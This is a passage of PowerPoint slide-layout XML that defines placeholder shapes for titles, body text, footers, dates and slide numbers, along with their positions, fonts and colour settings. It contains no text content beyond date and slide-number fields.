            <a:fld id="{83A15F68-7FD0-9E4E-91F7-E306E5234646}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>10/11/22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Holder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FF75E0EA-B05E-E043-A581-A29EA73A7A4B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{EBCBAEB2-3EB6-0D46-83F6-0A5D182807BD}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3472744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487426" y="257530"/>
            <a:ext cx="5083546" cy="823752"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="5353" b="1" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Holder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="502920" y="1787652"/>
            <a:ext cx="4375404" cy="607859"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Holder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5180076" y="1787652"/>
            <a:ext cx="4375404" cy="607859"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Holder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{286E0A30-E2BD-FE47-A86F-B050D4FEDE84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Holder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BDDA37EA-33F1-DA4E-9AF7-98CD06A881DA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{9211A978-AC0C-BB49-82CE-A7F4E6E9A11A}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>10/11/22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Holder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E9C5077-AAB9-2841-A852-8A0A50322CF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{D0D4719D-921F-BC49-92E4-BA75C35C2D13}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3563975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487426" y="257530"/>
            <a:ext cx="5083546" cy="823752"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="5353" b="1" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Holder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A85D769-ADC4-6B4B-B068-E516B061F0E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Holder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DDF5CF1-74B7-8B4F-A760-890F4BD508D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{AE3B0532-12E1-B448-B1B4-4A60F21F7B75}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>10/11/22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Holder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C868D592-1FD3-0248-BD08-DA659C9C8266}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{373ACF8D-AE84-3B40-B709-13E3E0107D5D}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="144948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71527" y="812800"/>
            <a:ext cx="8515350" cy="784830"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="5000" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Holder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1069975" y="2597152"/>
            <a:ext cx="7918450" cy="429204"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="2700" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Holder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{60FB0F9C-C0D7-DA44-8A7B-4A75DCF96B8D}"/>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497655B4-2E9C-C448-984C-93A108B338AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{A201B493-FE4E-D945-A3FB-A44D7230FBDA}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>10/11/22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Holder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EFF2C885-8505-CE49-A7E5-FED72D3F7435}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{3C6B22B8-0072-7B45-9027-436BB5FDE991}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1713027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bk object 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F07D5C4F-1E2B-E248-A9D5-5B9275FCA27C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1943100" y="517525"/>
            <a:ext cx="6202363" cy="67437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a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr defTabSz="457200">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr defTabSz="457200">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr defTabSz="457200">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr defTabSz="457200">
              <a:defRPr>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2279650" indent="1588"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736850" indent="1588"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94050" indent="1588"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651250" indent="1588"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endParaRPr lang="en-US" altLang="en-US" sz="900">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Holder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E11A34C0-3F26-5F43-AF9D-AE8803A146F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:defRPr>
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:tint val="75000"/>
                  </a:prstClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Holder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{168444D2-2C72-EC42-8E0F-E2665F879778}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr algn="l">
              <a:defRPr>
                <a:solidFill>
                  <a:prstClr val="black">
                    <a:tint val="75000"/>
                  </a:prstClr>
                </a:solidFill>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{AD8FEE27-E9E8-C049-A1A1-9D7759432291}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>10/11/22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Holder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{110E6B3C-6C3A-4F41-BAB7-0218FD00AE82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{D1F60E4E-3159-5A4C-A500-A1166F345564}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="327149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71527" y="812800"/>
            <a:ext cx="8515350" cy="784830"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="5000" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Holder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="502920" y="1787652"/>
            <a:ext cx="4375404" cy="423193"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Holder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5180076" y="1787652"/>
            <a:ext cx="4375404" cy="423193"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Holder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF1B60AB-0263-A64C-8917-25231E8B1CB9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Holder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30D253F6-8838-1C4F-80F1-8B4EF9E415C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{B7512803-50D2-F146-A1EB-DECA0D5585CE}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>10/11/22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Holder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF063B38-73BE-694C-8AA4-6DB8163A9EF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:fld id="{EB0F9565-3941-DD40-A32F-FFC6F241F992}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US"/>
              <a:pPr/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="148586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71527" y="812800"/>
            <a:ext cx="8515350" cy="784830"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr sz="5000" b="0" i="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Holder 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B7E6180-2D60-1E4C-8555-135FF3680F02}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Holder 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5912B15-7828-5C4C-B6F7-161A944374F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:fld id="{EB54EC3D-219F-1548-89CB-E15E8DAEBECE}" type="datetimeFigureOut">
              <a:rPr lang="en-US"/>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:t>10/11/22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Holder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F613919-F9DD-9E4A-A04F-0164B67D039E}"/>
              </a:ext>
            </a:extLst>
